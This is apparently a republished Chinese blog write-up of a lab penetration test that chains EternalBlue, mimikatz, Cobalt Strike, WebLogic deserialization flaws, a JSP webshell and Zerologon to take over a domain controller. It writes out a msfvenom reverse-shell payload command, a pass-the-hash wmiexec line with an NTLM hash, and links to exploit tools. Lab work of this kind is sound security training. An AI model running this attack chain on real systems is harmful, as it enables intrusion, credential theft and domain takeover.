记一次靶场搭建与渗透测试

这篇具有很好参考价值的文章主要介绍了记一次靶场搭建与渗透测试。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

渗透目标

通过Windows7打入工作组环境,穿透两层内网拿到DC(域控制器)权限
环境搭建

环境搭建

网络拓扑

永恒之蓝靶机搭建,渗透测试,安全,网络,web安全

虚拟机网络配置

永恒之蓝靶机搭建,渗透测试,安全,网络,web安全

渗透测试

永恒之蓝外网打点

nmap -sS 192.168.2.0/24扫描外网存活主机,发现两台主机192.168.2.128和192.168.2.129,并且445端口都是打开的,可能存在永恒之蓝漏洞
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
用msf来进行永恒之蓝漏洞的利用:search ms17-010
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
选择模块3来进行永恒之蓝漏洞的扫描:use 3,发现主机192.168.2.128存在永恒之蓝漏洞

永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
接着使用攻击模块对这个漏洞进行利用use exploit/windows/smb/ms17_010_eternalblue,同样设置set rhosts=192.168.2.12
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
权限已经是SYSTEM权限,简单查看一下系统信息,发现在一个工作组内(Domain: WORKGROUP)
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
导入mimikatz,尝试获取票据或者明文密码信息,得到密码:xiaodi
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全

Cobalt Strike上线Windows 7

关闭防火墙
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
开启teamserver
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
客户端连接永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
设置listener并且生成一个包含这个listener的木马
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
将木马上传到外网的Windows 7靶机并执行,靶机成功上线,查看网络
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
直接跑mimikatz得到密码xiaodi
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全

psexec横向移动到Windows 10

然后用Portscan扫描主机
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
执行完扫描后,Targets中会出现主机192.168.2.129,使用psexec进行横向,输入刚刚得到的用户名和密码:
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
成功拿下Windows10
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
收集相关信息,发现新的网段192.168.3.*
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
扫描一下端口,发现两台主机,一台192.168.3.128是这台Windows 10,另一台就是下一阶段的目标192.168.3.129
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全

MSF上线Windows 10

先生成一个反向木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.130 lport=6666 -f exe -o m2.exe
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
通过Cobalt Strike上传木马

永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
msf设置监听
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
成功上线,查看路由信息
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
添加路由
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
设置socks代理
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全配置kaili的全局代理工具proxychains

永恒之蓝靶机搭建,渗透测试,安全,网络,web安全

Weblogic打入win12

利用工具:https://github.com/rabbitmask/WeblogicScan
换成另一种代理方式,利用Cobalt Strike上代理
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
同样修改mousepad /etc/proxychains4.conf,配置好端口,再用
proxychains4 python WeblogicScan.py -u 192.168.3.129 -p 7001启动,发现存在weblogic相关的CVE漏洞
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全

存在cve-2016-0638,存在cve-2017-10271,存在cve-2017-3506等
然后利用工具:https://github.com/shack2/javaserializetools/releases,
proxychains4 java -jar javaserializetools.jar运行jar包,检测到漏洞
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
能够进行命令执行
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
冰蝎生成jsp木马永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
上传生成的jsp木马
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
连接木马
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
使用Cobalt Strike中转上线,设置监听
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
然后生成木马
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
使用冰蝎上传木马执行,成功拿下
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
至此拿到了三台机器永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
收集网络信息,发现网段192.168.10.*
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
端口扫描,发现其他两台机器:192.168.10.10和192.168.10.12
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全

横向移动到Win12-WEB

还是先在weblogic这台机器上跑mimiktaz
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
得到明文密码Administrator和Admin12345,再来试试横向移动
首先创建一个监听器,这里由于观察到上述端口扫描的结果中445端口是开放的,因此采用SMB类型监听器永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
然后进行横向移动永恒之蓝靶机搭建,渗透测试,安全,网络,web安全因为是中转的,所以有耐心点,等待几分钟后,连接建立
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
可以看到成功上线Win12-WEB
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
收集Win12-WEB的网络信息
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
查看系统信息
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
查看权限
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全

渗透域控

在上一步中192.168.10.*这个网段三个机器已经得到了两个,剩下的192.168.10.10就是我们最后的目标:DC:域控制器
在Win12-WEB这台机器上查看域控:

永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
Nmap扫描一下,没有发现特别的服务:

永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
然后尝试寻找DC的相关漏洞,尝试cve-2021-1472
首先使用cobalt strike开代理

永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
然后配置kali的proxychains4:mousepad /etc/proxychains4.conf
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
扫描一下端口:proxychains4 nmap 192.168.10.10,发现没有开什么特殊服务

永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
没办法,大海捞针,测试一下这个CVE:CVE-2020-1472(https://github.com/SecuraBV/CVE-2020-1472)
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
尝试利用这个漏洞:https://github.com/dirkjanm/CVE-2020-1472,成功置空DC密码
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
获取hash值
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全
利用得到的Administrator的hash值:aad3b435b51404eeaad3b435b51404ee:a402bea39d0f49b50ea1941120780ee3:::来进行横向移动
proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a402bea39d0f49b50ea1941120780ee3 DC$/Administrator@192.168.10.10
拿到域控shell,渗透结束

永恒之蓝靶机搭建,渗透测试,安全,网络,web安全

查看网络信息
永恒之蓝靶机搭建,渗透测试,安全,网络,web安全文章来源地址https://www.toymoban.com/news/detail-817387.html

到了这里,关于记一次靶场搭建与渗透测试的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 记一次网络安全渗透测试实战指南

    网址已无法访问,就不贴了 可以使用Fofa,火线,zoomeye,searchcode.com等爬取相关的资产,重点关注一些有漏洞暴露的框架和服务例如:泛微,PHP,Tomca,后台,weblogic等等。之后就主要分三步: 指纹识别、漏洞验证、漏洞复现。 指纹识别很好理解,我们要拿历史漏洞怼它,首

    2024年02月08日
    浏览(39)
  • 记一次奇妙的某个edu渗透测试

    对登录方法的轻视造成一系列的漏洞出现,对接口确实鉴权造成大量的信息泄露。从小程序到web端网址的奇妙的测试就此开始。(文章厚码,请见谅) 1. 寻找到目标站点的小程序 进入登录发现只需要姓名加学工号就能成功登录,通过googlehack的语法成功找到学生姓名和学号,

    2024年04月16日
    浏览(54)
  • 通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作

    环境说明 机器 ip地址 Kali主机 192.168.231.129 win7 靶机 192.168.231.143 1.使用kali虚拟机作为攻击机,利用nmap扫描获取目标的IP地址及漏洞,将两个机器包括一个攻击机Kali、win7的网络连接模式都是NAT,即在一个网段里面,然后进行扫描网段,查看存活主机,下面是两台机器的ip地址查

    2024年02月08日
    浏览(41)
  • 记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】

    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲

    2024年02月12日
    浏览(31)
  • 超细DVWA靶场搭建--(小黑栈渗透测试初级篇1)

    前言:对于渗透测试这块,最初阶段建议先学习一下前、后端知识,然后再学习一到两门语言,这样子方便后续的成为大佬做好基石。渗透测试的方向上建议先web渗透 --  APP渗透 --内网渗透,多打靶场多理解漏洞的原理和工具的利用,在学习的过程中遇到的问题多做笔记和记

    2024年01月21日
    浏览(34)
  • 实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) netdiscover扫描目的IP 发现开放端口为22和3000 访问3000 3000端口是node 对node.js稍有了解的都知道 3000是node.js的默认端口,简

    2024年02月13日
    浏览(24)
  • BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)

    渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。 Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况

    2024年02月13日
    浏览(34)
  • 一次零基础靶机渗透细节全程记录

            在本靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。         比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码

    2024年02月16日
    浏览(23)
  • Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记

    目录 学习前言 准备工作 一、寻找目标主机(信息收集) 二、敏感文件 三、Getshell上传木马 用蚁剑进行Getshell 四、寻找Linux密码进行ssh连接 五、连接SSH最后一步 六、总结 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去

    2024年02月14日
    浏览(31)
  • 记一次weblogic-10.3.6.0靶场漏洞利用

    进入Vuln-Range的weblogic-10.3.6.0靶场 靶场地址后面加上 /console 进入后台页面 使用weblogic漏洞利用工具进行扫描 删掉端口后面多余字符,输入/uddiexplorer/ 右上角图片新标签页打开 复制图片文件名 到weblogic中查找 输入 find ./ -name oracle_logo.gif(文件名) 找到的路径用记事本保存一下 在

    2023年04月18日
    浏览(29)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包